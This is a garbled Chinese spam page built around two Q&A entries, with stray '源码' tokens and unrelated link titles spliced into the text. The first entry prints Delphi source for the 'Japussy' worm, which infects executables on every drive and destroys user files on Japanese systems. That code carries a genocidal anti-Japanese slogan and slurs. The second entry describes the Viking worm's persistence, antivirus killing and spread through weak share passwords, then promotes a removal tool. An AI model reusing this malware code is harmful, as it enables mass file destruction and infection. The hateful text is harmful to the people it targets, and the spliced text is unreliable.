欢迎来到皮皮网官网

【openjdk源码编译】【激励广告源码】【tasker源码乱码】viking源码

时间:2024-12-30 00:00:12 来源:硬石教程 源码

1.熊猫烧香是源码用什么编成的?
2.维金病毒是什么样的病毒 感觉他很强的样子

viking源码

熊猫烧香是用什么编成的?

       我有看到过,反正不是源码c++ vb 编的:

       熊猫烧香的病毒源码:

       program Japussy;

       uses

       Windows, SysUtils, Classes, Graphics, ShellAPI{ , Registry};

       const

       HeaderSize = ; //病毒体的大小

       IconOffset = EB8; //PE文件主图标的偏移量

       //在我的Delphi5 SP1上面编译得到的大小,其它版本的源码Delphi可能不同

       //查找的十六进制字符串可以找到主图标的偏移量

       {

       HeaderSize = ; //Upx压缩过病毒体的大小

       IconOffset = BC; //Upx压缩过PE文件主图标的偏移量

       //Upx 1.W 用法: upx -9 -- Japussy.exe

       }

       IconSize = E8; //PE文件主图标的大小--字节

       IconTail = IconOffset + IconSize; //PE文件主图标的尾部

       ID = ; //感染标记

       //垃圾码,以备写入

       Catchword = 'If a race need to be killed out,源码 it must be Yamato. ' +

        'If a country need to be destroyed, it must be Japan! ' +

        '*** W.Japussy.Worm.A ***';

       { $R *.RES}

       function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

       stDCall; external 'Kernel.dll'; //函数声明

       var

       TmpFile: string;

       Si: STARTUPINFO;

       Pi: PROCESS_INFORMATION;

       IsJap: Boolean = False; //日文操作系统标记

       { 判断是否为Win9x }

       function IsWin9x: Boolean;

       var

       Ver: TOSVersionInfo;

       begin

       Result := False;

       Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

       if not GetVersionEx(Ver) then

        Exit;

       if (Ver.dwPlatformID = VER_PLATFORM_WIN_WINDOWS) then //Win9x

        Result := True;

       end;

       { 在流之间复制 }

       procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

       dStartPos: Integer; Count: Integer);

       var

       sCurPos, dCurPos: Integer;

       begin

       sCurPos := Src.Position;

       dCurPos := Dst.Position;

       Src.Seek(sStartPos, 0);

       Dst.Seek(dStartPos, 0);

       Dst.CopyFrom(Src, Count);

       Src.Seek(sCurPos, 0);

       Dst.Seek(dCurPos, 0);

       end;

       { 将宿主文件从已感染的PE文件中分离出来,以备使用 }

       procedure ExtractFile(FileName: string);

       var

       sStream,源码 dStream: TFileStream;

       begin

       try

        sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

        try

        dStream := TFileStream.Create(FileName, fmCreate);

        try

        sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

        dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

        finally

        dStream.Free;

        end;

        finally

        sStream.Free;

        end;

       except

       end;

       end;

       { 填充STARTUPINFO结构 }

       procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

       begin

       Si.cb := SizeOf(Si);

       Si.lpReserved := nil;

       Si.lpDesktop := nil;

       Si.lpTitle := nil;

       Si.dwFlags := STARTF_USESHOWWINDOW;

       Si.wShowWindow := State;

       Si.cbReserved2 := 0;

       Si.lpReserved2 := nil;

       end;

       { 发带毒邮件 }

       procedure SendMail;

       begin

       //哪位仁兄愿意完成之?

       end;

       { 感染PE文件 }

       procedure InfectOneFile(FileName: string);

       var

       HdrStream, SrcStream: TFileStream;

       IcoStream, DstStream: TMemoryStream;

       iID: LongInt;

       aIcon: TIcon;

       Infected, IsPE: Boolean;

       i: Integer;

       Buf: array[0..1] of Char;

       begin

       try //出错则文件正在被使用,退出

        if CompareText(FileName,源码openjdk源码编译 'JAPUSSY.EXE') = 0 then //是自己则不感染

        Exit;

        Infected := False;

        IsPE := False;

        SrcStream := TFileStream.Create(FileName, fmOpenRead);

        try

        for i := 0 to 8 do //检查PE文件头

        begin

        SrcStream.Seek(i, soFromBeginning);

        SrcStream.Read(Buf, 2);

        if (Buf[0] = #) and (Buf[1] = #) then //PE标记

        begin

        IsPE := True; //是PE文件

        Break;

        end;

        end;

        SrcStream.Seek(-4, soFromEnd); //检查感染标记

        SrcStream.Read(iID, 4);

        if (iID = ID) or (SrcStream.Size < ) then //太小的文件不感染

        Infected := True;

        finally

        SrcStream.Free;

        end;

        if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

        Exit;

        IcoStream := TMemoryStream.Create;

        DstStream := TMemoryStream.Create;

        try

        aIcon := TIcon.Create;

        try

        //得到被感染文件的主图标(字节),存入流

        aIcon.ReleaseHandle;

        aIcon.Handle := ExtractIcon(HInstance,源码 PChar(FileName), 0);

        aIcon.SaveToStream(IcoStream);

        finally

        aIcon.Free;

        end;

        SrcStream := TFileStream.Create(FileName, fmOpenRead);

        //头文件

        HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

        try

        //写入病毒体主图标之前的数据

        CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

        //写入目前程序的主图标

        CopyStream(IcoStream, , DstStream, IconOffset, IconSize);

        //写入病毒体主图标到病毒体尾部之间的数据

        CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

        //写入宿主程序

        CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

        //写入已感染的标记

        DstStream.Seek(0, 2);

        iID := ;

        DstStream.Write(iID, 4);

        finally

        HdrStream.Free;

        end;

        finally

        SrcStream.Free;

        IcoStream.Free;

        DstStream.SaveToFile(FileName); //替换宿主文件

        DstStream.Free;

        end;

       except;

       end;

       end;

       { 将目标文件写入垃圾码后删除 }

       procedure SmashFile(FileName: string);

       var

       FileHandle: Integer;

       i, Size, Mass, Max, Len: Integer;

       begin

       try

        SetFileAttributes(PChar(FileName), 0); //去掉只读属性

        FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

        try

        Size := GetFileSize(FileHandle, nil); //文件大小

        i := 0;

        Randomize;

        Max := Random(); //写入垃圾码的随机次数

        if Max < 5 then

        Max := 5;

        Mass := Size div Max; //每个间隔块的大小

        Len := Length(Catchword);

        while i < Max do

        begin

        FileSeek(FileHandle, i * Mass, 0); //定位

        //写入垃圾码,将文件彻底破坏掉

        FileWrite(FileHandle,源码 Catchword, Len);

        Inc(i);

        end;

        finally

        FileClose(FileHandle); //关闭文件

        end;

        DeleteFile(PChar(FileName)); //删除之

       except

       end;

       end;

       { 获得可写的驱动器列表 }

       function GetDrives: string;

       var

       DiskType: Word;

       D: Char;

       Str: string;

       i: Integer;

       begin

       for i := 0 to do //遍历个字母

       begin

        D := Chr(i + );

        Str := D + ':\';

        DiskType := GetDriveType(PChar(Str));

        //得到本地磁盘和网络盘

        if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

        Result := Result + D;

       end;

       end;

       { 遍历目录,感染和摧毁文件 }

       procedure LoopFiles(Path,源码 Mask: string);

       var

       i, Count: Integer;

       Fn, Ext: string;

       SubDir: TStrings;

       SearchRec: TSearchRec;

       Msg: TMsg;

       function IsValidDir(SearchRec: TSearchRec): Integer;

       begin

        if (SearchRec.Attr <> ) and (SearchRec.Name <> '.') and

        (SearchRec.Name <> '..') then

        Result := 0 //不是目录

        else if (SearchRec.Attr = ) and (SearchRec.Name <> '.') and

        (SearchRec.Name <> '..') then

        Result := 1 //不是根目录

        else Result := 2; //是根目录

       end;

       begin

       if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

       begin

        repeat

        PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

        if IsValidDir(SearchRec) = 0 then

        begin

        Fn := Path + SearchRec.Name;

        Ext := UpperCase(ExtractFileExt(Fn));

        if (Ext = '.EXE') or (Ext = '.SCR') then

        begin

        InfectOneFile(Fn); //感染可执行文件

        end

        else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

        begin

        //感染HTML和ASP文件,源码将Base编码后的源码病毒写入

        //感染浏览此网页的所有用户

        //哪位大兄弟愿意完成之?

        end

        else if Ext = '.WAB' then //Outlook地址簿文件

        begin

        //获取Outlook邮件地址

        end

        else if Ext = '.ADC' then //Foxmail地址自动完成文件

        begin

        //获取Foxmail邮件地址

        end

        else if Ext = 'IND' then //Foxmail地址簿文件

        begin

        //获取Foxmail邮件地址

        end

        else

        begin

        if IsJap then //是倭文操作系统

        begin

        if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

        (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

        (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

        (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

        (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

        (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

        SmashFile(Fn); //摧毁文件

        end;

        end;

        end;

        //感染或删除一个文件后睡眠毫秒,避免CPU占用率过高引起怀疑

        Sleep();

        until (FindNext(SearchRec) <> 0);

       end;

       FindClose(SearchRec);

       SubDir := TStringList.Create;

       if (FindFirst(Path + '*.*',源码 faDirectory, SearchRec) = 0) then

       begin

        repeat

        if IsValidDir(SearchRec) = 1 then

        SubDir.Add(SearchRec.Name);

        until (FindNext(SearchRec) <> 0);

        end;

       FindClose(SearchRec);

       Count := SubDir.Count - 1;

       for i := 0 to Count do

        LoopFiles(Path + SubDir.Strings + '\', Mask);

       FreeAndNil(SubDir);

       end;

       { 遍历磁盘上所有的文件 }

       procedure InfectFiles;

       var

       DriverList: string;

       i, Len: Integer;

       begin

       if GetACP = then //日文操作系统

        IsJap := True; //去死吧!

       DriverList := GetDrives; //得到可写的源码磁盘列表

       Len := Length(DriverList);

       while True do //死循环

       begin

        for i := Len downto 1 do //遍历每个磁盘驱动器

        LoopFiles(DriverList + ':\', '*.*'); //感染之

        SendMail; //发带毒邮件

        Sleep( * * 5); //睡眠5分钟

       end;

       end;

       { 主程序开始 }

       begin

       if IsWin9x then //是Win9x

        RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

       else //WinNT

       begin

        //远程线程映射到Explorer进程

        //哪位兄台愿意完成之?

       end;

       //如果是原始病毒体自己

       if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

        InfectFiles //感染和发邮件

       else //已寄生于宿主程序上了,开始工作

       begin

        TmpFile := ParamStr(0); //创建临时文件

        Delete(TmpFile,源码 Length(TmpFile) - 4, 4);

        TmpFile := TmpFile + # + '.exe'; //真正的宿主文件,多一个空格

        ExtractFile(TmpFile); //分离之

        FillStartupInfo(Si,源码 SW_SHOWDEFAULT);

        CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

        0, nil, '.', Si, Pi); //创建新进程运行之

        InfectFiles; //感染和发邮件

       end;

       end.

维金病毒是什么样的病毒 感觉他很强的样子

       近期有一个名为“威金蠕虫变种DR(Worm.Viking.dr)”的病毒正在互联网上肆虐。该病毒集文件型病毒、蠕虫病毒、病毒下载器于一身,传播能力非常强。该病毒会破坏用户的一些软件,造成它们无法使用。激励广告源码

        “威金蠕虫”是一个能在WIN9X/NT//XP系统上运行的蠕虫病毒,通过感染文件、局域网以及其他病毒下载传播。该病毒还会自动在后台下载并运行“QQ通行证”等其他病毒,窃取用户QQ及网络游戏的账号和密码并发送给黑客。由于该病毒在编写上存在一些问题,可造成一些用户的软件被破坏,无法使用。瑞星杀毒软件版可以清除掉染毒文件中的病毒,并将这些文件恢复成正常状态。tasker源码乱码

       一、病毒特征

        1、病毒运行后将自身复制到Windows文件夹下,文件名为:

        %SystemRoot%\rundl.exe

        2、运行被感染的文件后,病毒将病毒体复制到为以下文件:

       %SystemRoot%\logo_1.exe

        3、同时病毒会在病毒文件夹下生成:

       病毒目录\vdll.dll

        4、病毒从Z盘开始向前搜索所有可用分区中的exe文件,然后感染所有大小kb-mb的可执行文件,感染完毕在被感染的文件夹中生成:

       _desktop.ini (文件属性:系统、隐藏。224的源码)

        5、病毒会尝试修改%SysRoot%\system\drivers\etc\hosts文件。

        6、病毒通过添加如下注册表项实现病毒开机自动运行:

        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

        "load"="C:\\WINNT\\rundl.exe"

        [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

        "load"="C:\\WINNT\\rundl.exe"

        7、病毒运行时尝试查找窗体名为:"RavMonClass"的程序,查找到窗体后发送消息关闭该程序。

        8、枚举以下杀毒软件进程名,查找到后终止其进程:

       Ravmon.exe

       Eghost.exe

       Mailmon.exe

       KAVPFW.EXE

       IPARMOR.EXE

       Ravmond.exe

        9、同时病毒尝试利用以下命令终止相关杀病毒软件:

        net stop "Kingsoft AntiVirus Service"

        、抽奖源码制作发送ICMP探测数据"Hello,World",判断网络状态,网络可用时,枚举内网所有共享主机,并尝试用弱口令连接\\IPC$、\admin$等共享目录,连接成功后进行网络感染。

        、感染用户机器上的exe文件,但不感染以下文件夹中的文件:

       system

       system

       windows

       Documents and settings

       system Volume Information

       Recycled

       winnt

       Program Files

       Windows NT

       WindowsUpdate

       Windows Media Player

       Outlook Express

       Internet Explorer

       ComPlus Applications

       NetMeeting

       Common Files

       Messenger

       Microsoft Office

       InstallShield Installation Information

       MSN

       Microsoft Frontpage

       Movie Maker

       MSN Gaming Zone

       、枚举系统进程,尝试将病毒dll(vdll.dll)选择性注入以下进程名对应的进程:

       Explorer

       Iexplore

       找到符合条件的进程后随机注入以上两个进程中的其中一个。

       、当外网可用时,被注入的dll文件尝试连接以下网站下载并运行相关程序:

       /service/technology/RavVikiing.htm

       另外瑞星升级到最新版本也能清除该病毒,建议先手动删除然后在用瑞星扫描全盘。

       特别推荐:

       CHENOE Anti-Virus Tools 维金专杀 (民间版 魏滔序)

       有用户反应该病毒变种可抑制瑞星和卡巴斯基等主流杀毒软件的启动,在此前提下可安装这个民间版,软件不到一兆,在系统迟缓的前提下可轻松运行,相信对中此病毒的朋友能够有所帮助。

       软件简介

        维金病毒的泛滥愈演愈烈,月份发布了几个专杀工具帮助千百万计的用户脱离苦海,近日又接到了很多用户发来的维金病毒报告邮件,没想到这个病毒比原来更猖獗了.原来的工具源码在一次意外中丢失,这次又狠下心重新编写了,也加入了最新的维金病毒特征码.请有需要的广大的用户下载使用,更希望能把在使用时发现的问题反馈给我们,或到下面的"支持博客"中留言.

        该工具可以有效解除被感染的exe中的病毒并还原exe文件,网上的大部分工具是直接删除exe文件。另外,本工具还具有Viking免疫功能。

        下载后直接运行即可查杀,如果查杀几次都有无法关闭的进程的,重新启动一下计算机继续查杀应该可以杀掉。直到病毒数为0时为止。如果配合PlanTasks程序可发挥更大威力。

        专杀下载:/downloads.asp?file=kv8.com

       三、删除_desktop.ini

       该病毒会在每个文件夹中生成一个名为_desktop.ini的文件,一个个去删除,显然太费劲,(我的机器的操作系统因安装在NTFS格式下,所以系统盘下的文件夹中没有这个文件,另外盘下的文件夹无一幸免),因此在这里介绍给大家一个批处理命令 del d:\_desktop.ini /f/s/q/a,该命令的作用是:强制删除d盘下所有目录内(包括d盘本身)的_desktop.ini文件并且不提示是否删除/f 强制删除只读文件

       /q 指定静音状态。不提示您确认删除。/s 从当前目录及其所有子目录中删除指定文件。显示正在被删除的文件名。/a的意思是按照属性来删除了这个命令的作用是在杀掉viking病毒之后清理系统内残留的_desktop.ini文件用的使用方法是开始--所有程序--附件--命令提示符,键入上述命令(也可复制粘贴),首先删除D盘中的_desktop.ini,然后依此删除另外盘中的_desktop.ini。至此,该病毒对机器造成的影响全部消除。觉得有用的朋友们拿去试试吧 .

copyright © 2016 powered by 皮皮网   sitemap